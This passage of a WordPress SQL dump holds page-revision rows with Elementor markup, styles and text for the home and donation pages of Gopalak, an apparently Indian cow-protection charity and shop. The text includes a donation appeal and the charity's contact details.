src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:01:01','2022-10-20 12:31:01','',1373,'https://gopalak.in/?p=1962',0,'revision','',0),(1963,1,'2022-10-20 18:01:56','2022-10-20 12:31:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 18:01:56','2022-10-20 12:31:56','',1816,'https://gopalak.in/?p=1963',0,'revision','',0),(1964,1,'2022-10-20 18:01:56','2022-10-20 12:31:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 